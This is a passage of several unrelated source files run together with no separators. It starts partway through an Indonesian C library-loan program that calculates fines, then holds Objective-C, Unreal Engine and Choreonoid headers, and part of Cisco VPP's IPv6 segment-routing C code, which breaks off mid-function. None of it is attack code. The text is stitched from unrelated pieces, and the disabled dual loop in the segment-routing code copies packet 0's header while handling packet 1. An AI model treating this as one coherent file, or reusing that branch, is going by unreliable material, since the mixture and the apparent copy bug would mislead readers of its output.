  kmblbln = baca_angka("Bulan [MM] : ", 1, 12);
  kmblthn = baca_angka("Tahun [YYYY] : ", 1, 9999);

  system("cls");
  system("color 0");

  /* Fine: loan lasts 7 days; 30-day months / 360-day years, as before. */
  int lamaPinjam = (kmbltgl - pnjmtgl) + ((kmblbln - pnjmbln) * 30) + ((kmblthn - pnjmthn) * 360);
  int terlambat = (lamaPinjam > 7) ? (lamaPinjam - 7) : 0;

  printf("\nApakah Anda Punya Member ? (y/n)");
  scanf("%9s", member);
  int denda = terlambat * ((strcmp(member, "y") == 0) ? 500 : 1000);

  /* Due date: 7 days after borrowing, normalized to 30-day months. */
  jt_tgl = pnjmtgl + 7;
  jt_bln = pnjmbln + (jt_tgl / 30);
  jt_thn = pnjmthn + (jt_bln / 12);
  if (jt_tgl > 30) {
    jt_tgl -= 30;
  }
  if (jt_bln > 12) {
    jt_bln -= 12;
  }

  system("color D");
  printf("\nNama Penyewa Buku : %s", nama);
  printf("\nJumlah Buku : %d\n\n", jumlah_peminjaman);
  printf("-----------------------------------------------------------------\n");
  printf("| KODE BUKU | JENIS BUKU | JUDUL BUKU | JUMLAH BUKU|\n");
  printf("-----------------------------------------------------------------\n");
  for (int i = 1; i <= jumlah_peminjaman; i++) {
    int idx = cari_buku(kode[i]);
    if (idx >= 0) {
      printf(" %s %s %s %d \n\n", kode[i], jenis[idx], judul[idx], jumlah[i]);
    } else {
      printf(" %s %s %s %d \n\n", kode[i], "-", "-", jumlah[i]);
    }
  }
  printf("\n Tanggal Pinjam : %d - %d - %d", pnjmtgl, pnjmbln, pnjmthn);
  printf("\n Tanggal Kembali : %d - %d - %d", kmbltgl, kmblbln, kmblthn);
  printf("\n Tanggal Jatuh tempo : %d - %d - %d", jt_tgl, jt_bln, jt_thn);
  printf("\n Lama Peminjaman : %d hari", lamaPinjam);
  printf("\n Lama Keterlambatan : %d hari", terlambat);
  printf("\n Denda : Rp. %d", denda);
  printf("\n\n\n\t\t*****TERIMAKASIH %s ATAS KUNJUNGAN ANDA!***** \n", nama);
}

/* Entry point: show the menu until the user declines to repeat or picks
 * Exit (menu 4, which the original left unimplemented). */
int main() {
  char ulang[10];
  int menu;

  do {
    system("color 7D");
    printf("----------------------------------------------------------------\n");
    printf("| Syarat Dan Ketentuan: |");
    printf("\n----------------------------------------------------------------\n");
    printf("| 1. Diharap Mengisi Data Peminjaman Buku |\n");
    printf("| 2. Apabila Terlambat Mengembalikan Buku Akan Dikenakan Denda |\n");
    printf("----------------------------------------------------------------\n");
    printf("\n======================================\n");
    printf("| Selamat Datang Di Menu |\n");
    printf("======================================\n");
    printf("=============Perpustakaan=============\n");
    printf("| 1. Buat Kartu Perpustakaan |\n");
    printf("| 2. cek member |\n");
    printf("| 3. Pinjam Buku |\n");
    printf("| 4. Exit |\n");
    printf("======================================\n");
    printf("\n");
    printf("Silahkan masukkan nomor pada menu...\n");
    if (scanf("%d", &menu) != 1) { /* non-numeric input no longer loops forever */
      scanf("%*s");
      menu = 0;
    }
    /* Clear the screen (Windows and POSIX variants, as in the original). */
    system("cls");
    system("clear");

    if (menu == 1) {
      menuOneLibraryCard();
    } else if (menu == 2) {
      menuTwoCheckMember();
    } else if (menu == 3) {
      menuThreeBorrowBook();
    } else if (menu == 4) {
      return 0;
    }

    printf("\n\n--------------------------------\n");
    printf(" Apakah ingin mengulang ? (y/n)");
    printf("\n--------------------------------\n");
    scanf("%9s", ulang);
    system("cls");
  } while (strcmp(ulang, "y") == 0);
  return 0;
}
//
//  IntangibleAssets+CalculationBalance.h
//  BSTally
//
//  Created by junhong.zhu@lachesis-mh.com on 16/8/9.
//  Copyright © 2016 Danyow.Ed. All rights reserved.
//

#import "IntangibleAssets.h"

/// Category adding balance-calculation behaviour to IntangibleAssets.
@interface IntangibleAssets (CalculationBalance)

/// Update the balance for one detail entry.
/// @param singleDetail the detail row to account for
/// @param isAdd        presumably YES when the detail is being added and NO
///                     when it is being removed — confirm against the
///                     implementation in the .m file.
- (void)calculationBalanceWithSingleDetail:(Detail *)singleDetail isAdd:(BOOL)isAdd;

/// Recalculate the balance as a whole (no per-detail delta).
- (void)calculationBalance;

@end
// Copyright 1998-2015 Epic Games, Inc. All Rights Reserved. #pragma once #include "Editor/Sequencer/Public/MovieSceneTrackEditor.h" class IPropertyHandle; class F2DTransformTrackEditor : public FMovieSceneTrackEditor { public: /** * Constructor * * @param InSequencer The sequencer instance to be used by this tool */ F2DTransformTrackEditor( TSharedRef<ISequencer> InSequencer ); ~F2DTransformTrackEditor(); /** * Creates an instance of this class. Called by a sequencer * * @param OwningSequencer The sequencer instance to be used by this tool * @return The new instance of this class */ static TSharedRef<FMovieSceneTrackEditor> CreateTrackEditor( TSharedRef<ISequencer> OwningSequencer ); /** FMovieSceneTrackEditor Interface */ virtual bool SupportsType( TSubclassOf<UMovieSceneTrack> Type ) const override; virtual TSharedRef<ISequencerSection> MakeSectionInterface( UMovieSceneSection& SectionObject, UMovieSceneTrack* Track ) override; private: /** * Called by the details panel when an animatable property changes * * @param InObjectsThatChanged List of objects that changed * @param PropertyValue Handle to the property value which changed */ void OnTransformChanged( const class FPropertyChangedParams& PropertyChangedParams ); /** Called After OnMarginChanged if we actually can key the margin */ void OnKeyTransform( float KeyTime, const class FPropertyChangedParams* PropertyChangedParams ); };
//
//  MOPUBNativeVideoAdAdapter.h
//  Copyright (c) 2015 MoPub. All rights reserved.
//

#import "MPNativeAdAdapter.h"

/// Adapter exposing a MoPub native video ad through the MPNativeAdAdapter
/// protocol.
@interface MOPUBNativeVideoAdAdapter : NSObject <MPNativeAdAdapter>

/// Receives lifecycle callbacks required by MPNativeAdAdapterDelegate.
@property (nonatomic, weak) id<MPNativeAdAdapterDelegate> delegate;

/// URLs pinged when a video impression is recorded.
@property (nonatomic, readonly) NSArray *impressionTrackerURLs;

/// URLs pinged when the video view is clicked.
@property (nonatomic, readonly) NSArray *clickTrackerURLs;

/// Designated initializer; `properties` carries the ad's payload
/// (keys/values defined by the implementation — see the .m file).
- (instancetype)initWithAdProperties:(NSMutableDictionary *)properties;

/// Report an impression on the video view.
- (void)handleVideoViewImpression;

/// Report a click on the video view.
- (void)handleVideoViewClick;

@end
/**
   @file
   @author Shin'ichiro Nakaoka
*/

#ifndef CNOID_UTIL_MULTI_SE3_SEQ_H
#define CNOID_UTIL_MULTI_SE3_SEQ_H

#include "MultiSeq.h"
#include "EigenTypes.h"
#include "exportdecl.h"

namespace cnoid {

class Mapping;
class Listing;
class YAMLWriter;

/**
   Multi-part sequence of SE(3) (position + orientation) samples.
   Uses Eigen's aligned allocator because SE3 contains fixed-size
   vectorizable Eigen members.
*/
class CNOID_EXPORT MultiSE3Seq : public MultiSeq<SE3, Eigen::aligned_allocator<SE3> >
{
    typedef MultiSeq<SE3, Eigen::aligned_allocator<SE3> > BaseSeqType;

public:
    typedef boost::shared_ptr<MultiSE3Seq> Ptr;

    MultiSE3Seq();
    MultiSE3Seq(int numFrames, int numParts = 1);
    MultiSE3Seq(const MultiSE3Seq& org);
    virtual ~MultiSE3Seq();

    virtual AbstractSeqPtr cloneSeq() const;

    //virtual bool loadPlainFormat(const std::string& filename);

    // Plain text matrix I/O (format details in the implementation file).
    bool loadPlainMatrixFormat(const std::string& filename);
    bool saveTopPartAsPlainMatrixFormat(const std::string& filename);

protected:
    // Default sample: identity pose (zero translation, identity rotation).
    virtual SE3 defaultValue() const { return SE3(Vector3::Zero(), Quat::Identity()); }

    virtual bool doWriteSeq(YAMLWriter& writer);
    virtual bool doReadSeq(const Mapping& archive);

private:
    // Helpers for doReadSeq: position+quaternion rows (isWfirst selects
    // the quaternion component order) vs. position+roll/pitch/yaw rows.
    void readPosQuatSeq(int nParts, int nFrames, const Listing& values, bool isWfirst);
    void readPosRpySeq(int nParts, int nFrames, const Listing& values);
};

typedef MultiSE3Seq::Ptr MultiSE3SeqPtr;

}

#endif
/* * sr.c: ipv6 segment routing * * Copyright (c) 2013 Cisco and/or its affiliates. * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at: * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ /** * @file * @brief Segment Routing main functions * */ #include <vnet/vnet.h> #include <vnet/sr/sr.h> #include <vnet/fib/ip6_fib.h> #include <vnet/dpo/dpo.h> #include <openssl/hmac.h> ip6_sr_main_t sr_main; static vlib_node_registration_t sr_local_node; /** * @brief Dynamically added SR DPO type */ static dpo_type_t sr_dpo_type; /** * @brief Use passed HMAC key in ip6_sr_header_t in OpenSSL HMAC routines * * @param sm ip6_sr_main_t * * @param ip ip6_header_t * * @param sr ip6_sr_header_t * */ void sr_fix_hmac (ip6_sr_main_t * sm, ip6_header_t * ip, ip6_sr_header_t * sr) { u32 key_index; static u8 *keybuf; u8 *copy_target; int first_segment; ip6_address_t *addrp; int i; ip6_sr_hmac_key_t *hmac_key; u32 sig_len; key_index = sr->hmac_key; /* No signature? Pass... */ if (key_index == 0) return; /* We don't know about this key? Fail... */ if (key_index >= vec_len (sm->hmac_keys)) return; hmac_key = sm->hmac_keys + key_index; vec_reset_length (keybuf); /* pkt ip6 src address */ vec_add2 (keybuf, copy_target, sizeof (ip6_address_t)); clib_memcpy (copy_target, ip->src_address.as_u8, sizeof (ip6_address_t)); /* first segment */ vec_add2 (keybuf, copy_target, 1); copy_target[0] = sr->first_segment; /* octet w/ bit 0 = "clean" flag */ vec_add2 (keybuf, copy_target, 1); copy_target[0] = (sr->flags & clib_host_to_net_u16 (IP6_SR_HEADER_FLAG_CLEANUP)) ? 
0x80 : 0; /* hmac key id */ vec_add2 (keybuf, copy_target, 1); copy_target[0] = sr->hmac_key; first_segment = sr->first_segment; addrp = sr->segments; /* segments */ for (i = 0; i <= first_segment; i++) { vec_add2 (keybuf, copy_target, sizeof (ip6_address_t)); clib_memcpy (copy_target, addrp->as_u8, sizeof (ip6_address_t)); addrp++; } addrp++; HMAC_CTX_init (sm->hmac_ctx); if (!HMAC_Init (sm->hmac_ctx, hmac_key->shared_secret, vec_len (hmac_key->shared_secret), sm->md)) clib_warning ("barf1"); if (!HMAC_Update (sm->hmac_ctx, keybuf, vec_len (keybuf))) clib_warning ("barf2"); if (!HMAC_Final (sm->hmac_ctx, (unsigned char *) addrp, &sig_len)) clib_warning ("barf3"); HMAC_CTX_cleanup (sm->hmac_ctx); } /** * @brief Format function for decoding various SR flags * * @param s u8 * - formatted string * @param args va_list * - u16 flags * * @return formatted output string u8 * */ u8 * format_ip6_sr_header_flags (u8 * s, va_list * args) { u16 flags = (u16) va_arg (*args, int); u8 pl_flag; int bswap_needed = va_arg (*args, int); int i; if (bswap_needed) flags = clib_host_to_net_u16 (flags); if (flags & IP6_SR_HEADER_FLAG_CLEANUP) s = format (s, "cleanup "); if (flags & IP6_SR_HEADER_FLAG_PROTECTED) s = format (s, "reroute "); s = format (s, "pl: "); for (i = 1; i <= 4; i++) { pl_flag = ip6_sr_policy_list_flags (flags, i); s = format (s, "[%d] ", i); switch (pl_flag) { case IP6_SR_HEADER_FLAG_PL_ELT_NOT_PRESENT: s = format (s, "NotPr "); break; case IP6_SR_HEADER_FLAG_PL_ELT_INGRESS_PE: s = format (s, "InPE "); break; case IP6_SR_HEADER_FLAG_PL_ELT_EGRESS_PE: s = format (s, "EgPE "); break; case IP6_SR_HEADER_FLAG_PL_ELT_ORIG_SRC_ADDR: s = format (s, "OrgSrc "); break; } } return s; } /** * @brief Format function for decoding ip6_sr_header_t * * @param s u8 * - formatted string * @param args va_list * - ip6_sr_header_t * * @return formatted output string u8 * */ u8 * format_ip6_sr_header (u8 * s, va_list * args) { ip6_sr_header_t *h = va_arg (*args, ip6_sr_header_t *); 
ip6_address_t placeholder_addr = { {254, 254, 254, 254, 254, 254, 254, 254, 254, 254, 254, 254, 254, 254, 254, 254} }; int print_hmac = va_arg (*args, int); int i, pl_index, max_segs; int flags_host_byte_order = clib_net_to_host_u16 (h->flags); s = format (s, "next proto %d, len %d, type %d", h->protocol, (h->length << 3) + 8, h->type); s = format (s, "\n segs left %d, first_segment %d, hmac key %d", h->segments_left, h->first_segment, h->hmac_key); s = format (s, "\n flags %U", format_ip6_sr_header_flags, flags_host_byte_order, 0 /* bswap needed */ ); /* * Header length is in 8-byte units (minus one), so * divide by 2 to ascertain the number of ip6 addresses in the * segment list */ max_segs = (h->length >> 1); if (!print_hmac && h->hmac_key) max_segs -= 2; s = format (s, "\n Segments (in processing order):"); for (i = h->first_segment; i >= 1; i--) s = format (s, "\n %U", format_ip6_address, h->segments + i); if (ip6_address_is_equal (&placeholder_addr, h->segments)) s = format (s, "\n (empty placeholder)"); else s = format (s, "\n %U", format_ip6_address, h->segments); s = format (s, "\n Policy List:"); pl_index = 1; /* to match the RFC text */ for (i = (h->first_segment + 1); i < max_segs; i++, pl_index++) { char *tag; char *tags[] = { " ", "InPE: ", "EgPE: ", "OrgSrc: " }; tag = tags[0]; if (pl_index >= 1 && pl_index <= 4) { int this_pl_flag = ip6_sr_policy_list_flags (flags_host_byte_order, pl_index); tag = tags[this_pl_flag]; } s = format (s, "\n %s%U", tag, format_ip6_address, h->segments + i); } return s; } /** * @brief Format function for decoding ip6_sr_header_t with length * * @param s u8 * - formatted string * @param args va_list * - ip6_header_t + ip6_sr_header_t * * @return formatted output string u8 * */ u8 * format_ip6_sr_header_with_length (u8 * s, va_list * args) { ip6_header_t *h = va_arg (*args, ip6_header_t *); u32 max_header_bytes = va_arg (*args, u32); uword header_bytes; header_bytes = sizeof (h[0]) + sizeof (ip6_sr_header_t); if 
(max_header_bytes != 0 && header_bytes > max_header_bytes) return format (s, "ip6_sr header truncated"); s = format (s, "IP6: %U\n", format_ip6_header, h, max_header_bytes); s = format (s, "SR: %U\n", format_ip6_sr_header, (ip6_sr_header_t *) (h + 1), 0 /* print_hmac */ , max_header_bytes); return s; } /** * @brief Defined valid next nodes * @note Cannot call replicate yet without DPDK */ #if DPDK > 0 #define foreach_sr_rewrite_next \ _(ERROR, "error-drop") \ _(IP6_LOOKUP, "ip6-lookup") \ _(SR_LOCAL, "sr-local") \ _(SR_REPLICATE,"sr-replicate") #else #define foreach_sr_rewrite_next \ _(ERROR, "error-drop") \ _(IP6_LOOKUP, "ip6-lookup") \ _(SR_LOCAL, "sr-local") #endif /* DPDK */ /** * @brief Struct for defined valid next nodes */ typedef enum { #define _(s,n) SR_REWRITE_NEXT_##s, foreach_sr_rewrite_next #undef _ SR_REWRITE_N_NEXT, } sr_rewrite_next_t; /** * @brief Struct for data for SR rewrite packet trace */ typedef struct { ip6_address_t src, dst; u16 length; u32 next_index; u32 tunnel_index; u8 sr[256]; } sr_rewrite_trace_t; /** * @brief Error strings for SR rewrite */ static char *sr_rewrite_error_strings[] = { #define sr_error(n,s) s, #include "sr_error.def" #undef sr_error }; /** * @brief Struct for SR rewrite error strings */ typedef enum { #define sr_error(n,s) SR_REWRITE_ERROR_##n, #include "sr_error.def" #undef sr_error SR_REWRITE_N_ERROR, } sr_rewrite_error_t; /** * @brief Format function for SR rewrite trace. 
*/ u8 * format_sr_rewrite_trace (u8 * s, va_list * args) { CLIB_UNUSED (vlib_main_t * vm) = va_arg (*args, vlib_main_t *); CLIB_UNUSED (vlib_node_t * node) = va_arg (*args, vlib_node_t *); sr_rewrite_trace_t *t = va_arg (*args, sr_rewrite_trace_t *); ip6_sr_main_t *sm = &sr_main; ip6_sr_tunnel_t *tun = pool_elt_at_index (sm->tunnels, t->tunnel_index); ip6_fib_t *rx_fib, *tx_fib; rx_fib = ip6_fib_get (tun->rx_fib_index); tx_fib = ip6_fib_get (tun->tx_fib_index); s = format (s, "SR-REWRITE: next %s ip6 src %U dst %U len %u\n" " rx-fib-id %d tx-fib-id %d\n%U", (t->next_index == SR_REWRITE_NEXT_SR_LOCAL) ? "sr-local" : "ip6-lookup", format_ip6_address, &t->src, format_ip6_address, &t->dst, t->length, rx_fib->table_id, tx_fib->table_id, format_ip6_sr_header, t->sr, 0 /* print_hmac */ ); return s; } /** * @brief Main processing dual-loop for Segment Routing Rewrite * @node sr-rewrite * * @param vm vlib_main_t * * @param node vlib_node_runtime_t * * @param from_frame vlib_frame_t * * * @return from_frame->n_vectors uword */ static uword sr_rewrite (vlib_main_t * vm, vlib_node_runtime_t * node, vlib_frame_t * from_frame) { u32 n_left_from, next_index, *from, *to_next; ip6_main_t *im = &ip6_main; ip_lookup_main_t *lm = &im->lookup_main; ip6_sr_main_t *sm = &sr_main; u32 (*sr_local_cb) (vlib_main_t *, vlib_node_runtime_t *, vlib_buffer_t *, ip6_header_t *, ip6_sr_header_t *); sr_local_cb = sm->sr_local_cb; from = vlib_frame_vector_args (from_frame); n_left_from = from_frame->n_vectors; next_index = node->cached_next_index; while (n_left_from > 0) { u32 n_left_to_next; vlib_get_next_frame (vm, node, next_index, to_next, n_left_to_next); /* Note 2x loop disabled */ while (0 && n_left_from >= 4 && n_left_to_next >= 2) { u32 bi0, bi1; vlib_buffer_t *b0, *b1; ip6_header_t *ip0, *ip1; ip_adjacency_t *adj0, *adj1; ip6_sr_header_t *sr0, *sr1; ip6_sr_tunnel_t *t0, *t1; u32 next0 = SR_REWRITE_NEXT_IP6_LOOKUP; u32 next1 = SR_REWRITE_NEXT_IP6_LOOKUP; u16 new_l0 = 0; u16 new_l1 = 0; /* 
Prefetch next iteration. */ { vlib_buffer_t *p2, *p3; p2 = vlib_get_buffer (vm, from[2]); p3 = vlib_get_buffer (vm, from[3]); vlib_prefetch_buffer_header (p2, LOAD); vlib_prefetch_buffer_header (p3, LOAD); } bi0 = from[0]; bi1 = from[1]; to_next[0] = bi0; to_next[1] = bi1; from += 2; to_next += 2; n_left_to_next -= 2; n_left_from -= 2; b0 = vlib_get_buffer (vm, bi0); b1 = vlib_get_buffer (vm, bi1); /* * $$$ parse through header(s) to pick the point * where we punch in the SR extention header */ adj0 = ip_get_adjacency (lm, vnet_buffer (b0)->ip.adj_index[VLIB_TX]); adj1 = ip_get_adjacency (lm, vnet_buffer (b1)->ip.adj_index[VLIB_TX]); t0 = pool_elt_at_index (sm->tunnels, adj0->rewrite_header.sw_if_index); t1 = pool_elt_at_index (sm->tunnels, adj1->rewrite_header.sw_if_index); ASSERT (VLIB_BUFFER_PRE_DATA_SIZE >= ((word) vec_len (t0->rewrite)) + b0->current_data); ASSERT (VLIB_BUFFER_PRE_DATA_SIZE >= ((word) vec_len (t1->rewrite)) + b1->current_data); vnet_buffer (b0)->sw_if_index[VLIB_TX] = t0->tx_fib_index; vnet_buffer (b1)->sw_if_index[VLIB_TX] = t1->tx_fib_index; ip0 = vlib_buffer_get_current (b0); ip1 = vlib_buffer_get_current (b1); /* * SR-unaware service chaining case: pkt coming back from * service has the original dst address, and will already * have an SR header. If so, send it to sr-local */ if (PREDICT_FALSE (ip0->protocol == IPPROTO_IPV6_ROUTE)) { vlib_buffer_advance (b0, sizeof (ip0)); sr0 = (ip6_sr_header_t *) (ip0 + 1); new_l0 = clib_net_to_host_u16 (ip0->payload_length); next0 = SR_REWRITE_NEXT_SR_LOCAL; } else { /* * Copy data before the punch-in point left by the * required amount. Assume (for the moment) that only * the main packet header needs to be copied. 
*/ clib_memcpy (((u8 *) ip0) - vec_len (t0->rewrite), ip0, sizeof (ip6_header_t)); vlib_buffer_advance (b0, -(word) vec_len (t0->rewrite)); ip0 = vlib_buffer_get_current (b0); sr0 = (ip6_sr_header_t *) (ip0 + 1); /* $$$ tune */ clib_memcpy (sr0, t0->rewrite, vec_len (t0->rewrite)); /* Fix the next header chain */ sr0->protocol = ip0->protocol; ip0->protocol = IPPROTO_IPV6_ROUTE; /* routing extension header */ new_l0 = clib_net_to_host_u16 (ip0->payload_length) + vec_len (t0->rewrite); ip0->payload_length = clib_host_to_net_u16 (new_l0); /* Copy dst address into the DA slot in the segment list */ clib_memcpy (sr0->segments, ip0->dst_address.as_u64, sizeof (ip6_address_t)); /* Rewrite the ip6 dst address with the first hop */ clib_memcpy (ip0->dst_address.as_u64, t0->first_hop.as_u64, sizeof (ip6_address_t)); sr_fix_hmac (sm, ip0, sr0); next0 = sr_local_cb ? sr_local_cb (vm, node, b0, ip0, sr0) : next0; /* * Ignore "do not rewrite" shtik in this path */ if (PREDICT_FALSE (next0 & 0x80000000)) { next0 ^= 0xFFFFFFFF; if (PREDICT_FALSE (next0 == SR_REWRITE_NEXT_ERROR)) b0->error = node->errors[SR_REWRITE_ERROR_APP_CALLBACK]; } } if (PREDICT_FALSE (ip1->protocol == IPPROTO_IPV6_ROUTE)) { vlib_buffer_advance (b1, sizeof (ip1)); sr1 = (ip6_sr_header_t *) (ip1 + 1); new_l1 = clib_net_to_host_u16 (ip1->payload_length); next1 = SR_REWRITE_NEXT_SR_LOCAL; } else { clib_memcpy (((u8 *) ip0) - vec_len (t0->rewrite), ip0, sizeof (ip6_header_t)); vlib_buffer_advance (b1, -(word) vec_len (t1->rewrite)); ip1 = vlib_buffer_get_current (b1); sr1 = (ip6_sr_header_t *) (ip1 + 1); clib_memcpy (sr1, t1->rewrite, vec_len (t1->rewrite)); sr1->protocol = ip1->protocol; ip1->protocol = IPPROTO_IPV6_ROUTE; new_l1 = clib_net_to_host_u16 (ip1->payload_length) + vec_len (t1->rewrite); ip1->payload_length = clib_host_to_net_u16 (new_l1); /* Copy dst address into the DA slot in the segment list */ clib_memcpy (sr1->segments, ip1->dst_address.as_u64, sizeof (ip6_address_t)); /* Rewrite the ip6 dst 
address with the first hop */ clib_memcpy (ip1->dst_address.as_u64, t1->first_hop.as_u64, sizeof (ip6_address_t)); sr_fix_hmac (sm, ip1, sr1); next1 = sr_local_cb ? sr_local_cb (vm, node, b1, ip1, sr1) : next1; /* * Ignore "do not rewrite" shtik in this path */ if (PREDICT_FALSE (next1 & 0x80000000)) { next1 ^= 0xFFFFFFFF; if (PREDICT_FALSE (next1 == SR_REWRITE_NEXT_ERROR)) b1->error = node->errors[SR_REWRITE_ERROR_APP_CALLBACK]; } } if (PREDICT_FALSE (b0->flags & VLIB_BUFFER_IS_TRACED)) { sr_rewrite_trace_t *tr = vlib_add_trace (vm, node, b0, sizeof (*tr)); tr->tunnel_index = t0 - sm->tunnels; clib_memcpy (tr->src.as_u8, ip0->src_address.as_u8, sizeof (tr->src.as_u8)); clib_memcpy (tr->dst.as_u8, ip0->dst_address.as_u8, sizeof (tr->dst.as_u8)); tr->length = new_l0; tr->next_index = next0; clib_memcpy (tr->sr, sr0, sizeof (tr->sr)); } if (PREDICT_FALSE (b1->flags & VLIB_BUFFER_IS_TRACED)) { sr_rewrite_trace_t *tr = vlib_add_trace (vm, node, b1, sizeof (*tr)); tr->tunnel_index = t1 - sm->tunnels; clib_memcpy (tr->src.as_u8, ip1->src_address.as_u8, sizeof (tr->src.as_u8)); clib_memcpy (tr->dst.as_u8, ip1->dst_address.as_u8, sizeof (tr->dst.as_u8)); tr->length = new_l1; tr->next_index = next1; clib_memcpy (tr->sr, sr1, sizeof (tr->sr)); } vlib_validate_buffer_enqueue_x2 (vm, node, next_index, to_next, n_left_to_next, bi0, bi1, next0, next1); } while (n_left_from > 0 && n_left_to_next > 0) { u32 bi0; vlib_buffer_t *b0; ip6_header_t *ip0 = 0; ip_adjacency_t *adj0; ip6_sr_header_t *sr0 = 0; ip6_sr_tunnel_t *t0; u32 next0 = SR_REWRITE_NEXT_IP6_LOOKUP; u16 new_l0 = 0; bi0 = from[0]; to_next[0] = bi0; from += 1; to_next += 1; n_left_from -= 1; n_left_to_next -= 1; b0 = vlib_get_buffer (vm, bi0); /* * $$$ parse through header(s) to pick the point * where we punch in the SR extention header */ adj0 = ip_get_adjacency (lm, vnet_buffer (b0)->ip.adj_index[VLIB_TX]); t0 = pool_elt_at_index (sm->tunnels, adj0->rewrite_header.sw_if_index); #if DPDK > 0 /* Cannot call replication 
node yet without DPDK */ /* add a replication node */ if (PREDICT_FALSE (t0->policy_index != ~0)) { vnet_buffer (b0)->ip.save_protocol = t0->policy_index; next0 = SR_REWRITE_NEXT_SR_REPLICATE; goto trace0; } #endif /* DPDK */ ASSERT (VLIB_BUFFER_PRE_DATA_SIZE >= ((word) vec_len (t0->rewrite)) + b0->current_data); vnet_buffer (b0)->sw_if_index[VLIB_TX] = t0->tx_fib_index; ip0 = vlib_buffer_get_current (b0); /* * SR-unaware service chaining case: pkt coming back from * service has the original dst address, and will already * have an SR header. If so, send it to sr-local */ if (PREDICT_FALSE (ip0->protocol == IPPROTO_IPV6_ROUTE)) { vlib_buffer_advance (b0, sizeof (ip0)); sr0 = (ip6_sr_header_t *) (ip0 + 1); new_l0 = clib_net_to_host_u16 (ip0->payload_length); next0 = SR_REWRITE_NEXT_SR_LOCAL; } else { /* * Copy data before the punch-in point left by the * required amount. Assume (for the moment) that only * the main packet header needs to be copied. */ clib_memcpy (((u8 *) ip0) - vec_len (t0->rewrite), ip0, sizeof (ip6_header_t)); vlib_buffer_advance (b0, -(word) vec_len (t0->rewrite)); ip0 = vlib_buffer_get_current (b0); sr0 = (ip6_sr_header_t *) (ip0 + 1); /* $$$ tune */ clib_memcpy (sr0, t0->rewrite, vec_len (t0->rewrite)); /* Fix the next header chain */ sr0->protocol = ip0->protocol; ip0->protocol = IPPROTO_IPV6_ROUTE; /* routing extension header */ new_l0 = clib_net_to_host_u16 (ip0->payload_length) + vec_len (t0->rewrite); ip0->payload_length = clib_host_to_net_u16 (new_l0); /* Copy dst address into the DA slot in the segment list */ clib_memcpy (sr0->segments, ip0->dst_address.as_u64, sizeof (ip6_address_t)); /* Rewrite the ip6 dst address with the first hop */ clib_memcpy (ip0->dst_address.as_u64, t0->first_hop.as_u64, sizeof (ip6_address_t)); sr_fix_hmac (sm, ip0, sr0); next0 = sr_local_cb ? 
sr_local_cb (vm, node, b0, ip0, sr0) : next0; /* * Ignore "do not rewrite" shtik in this path */ if (PREDICT_FALSE (next0 & 0x80000000)) { next0 ^= 0xFFFFFFFF; if (PREDICT_FALSE (next0 == SR_REWRITE_NEXT_ERROR)) b0->error = node->errors[SR_REWRITE_ERROR_APP_CALLBACK]; } } #if DPDK > 0 /* Cannot run replicate without DPDK and only replicate uses this label */ trace0: #endif /* DPDK */ if (PREDICT_FALSE (b0->flags & VLIB_BUFFER_IS_TRACED)) { sr_rewrite_trace_t *tr = vlib_add_trace (vm, node, b0, sizeof (*tr)); tr->tunnel_index = t0 - sm->tunnels; if (ip0) { memcpy (tr->src.as_u8, ip0->src_address.as_u8, sizeof (tr->src.as_u8)); memcpy (tr->dst.as_u8, ip0->dst_address.as_u8, sizeof (tr->dst.as_u8)); } tr->length = new_l0; tr->next_index = next0; clib_memcpy (tr->sr, sr0, sizeof (tr->sr)); } vlib_validate_buffer_enqueue_x1 (vm, node, next_index, to_next, n_left_to_next, bi0, next0); } vlib_put_next_frame (vm, node, next_index, n_left_to_next); } return from_frame->n_vectors; } /* *INDENT-OFF* */ VLIB_REGISTER_NODE (sr_rewrite_node) = { .function = sr_rewrite, .name = "sr-rewrite", /* Takes a vector of packets. 
*/
  .vector_size = sizeof (u32),
  .format_trace = format_sr_rewrite_trace,
  .format_buffer = format_ip6_sr_header_with_length,

  .n_errors = SR_REWRITE_N_ERROR,
  .error_strings = sr_rewrite_error_strings,

  .runtime_data_bytes = 0,

  .n_next_nodes = SR_REWRITE_N_NEXT,
  .next_nodes = {
#define _(s,n) [SR_REWRITE_NEXT_##s] = n,
    foreach_sr_rewrite_next
#undef _
  },
};
/* *INDENT-ON* */

VLIB_NODE_FUNCTION_MULTIARCH (sr_rewrite_node, sr_rewrite)
/**
 * @brief Delete the SR-owned FIB entry for dst/mask in the given rx table.
 *
 * Only removes the FIB_SOURCE_SR contribution for the prefix; no next-hop
 * bookkeeping is done here (hence the name).
 *
 * @param dst_address_arg ip6_address_t * prefix to delete
 * @param dst_address_length u32 prefix length
 * @param rx_table_id u32 FIB table id (not index) the route lives in
 *
 * @return 0 always
 */
static int
ip6_delete_route_no_next_hop (ip6_address_t * dst_address_arg,
			      u32 dst_address_length, u32 rx_table_id)
{
  fib_prefix_t pfx = {
    .fp_len = dst_address_length,
    .fp_proto = FIB_PROTOCOL_IP6,
    .fp_addr = {
		.ip6 = *dst_address_arg,
		}
  };

  /* Translate table id -> fib index, then drop the SR-sourced entry */
  fib_table_entry_delete (fib_table_id_find_fib_index (FIB_PROTOCOL_IP6,
						       rx_table_id),
			  &pfx, FIB_SOURCE_SR);

  return 0;
}

/**
 * @brief Find or add if not found - HMAC shared secret
 *
 * Looks the secret up in hmac_key_by_shared_secret; on miss, either uses
 * the caller-requested slot (*indexp non-zero) or scans for the first free
 * slot (shared_secret == 0), growing the vector if none is free.
 *
 * @param sm ip6_sr_main_t *
 * @param secret u8 * (vector; duplicated on store, caller keeps ownership)
 * @param indexp u32 * in: requested key slot (0 = any); out: chosen slot
 *
 * @return ip6_sr_hmac_key_t *
 */
static ip6_sr_hmac_key_t *
find_or_add_shared_secret (ip6_sr_main_t * sm, u8 * secret, u32 * indexp)
{
  uword *p;
  ip6_sr_hmac_key_t *key = 0;
  int i;

  p = hash_get_mem (sm->hmac_key_by_shared_secret, secret);

  if (p)
    {
      /* Already known: hand back the existing slot */
      key = vec_elt_at_index (sm->hmac_keys, p[0]);
      if (indexp)
	*indexp = p[0];
      return (key);
    }

  /* Specific key ID? */
  if (indexp && *indexp)
    {
      vec_validate (sm->hmac_keys, *indexp);
      key = sm->hmac_keys + *indexp;
    }
  else
    {
      /* First-fit scan for an unused slot; fall through to grow-by-one */
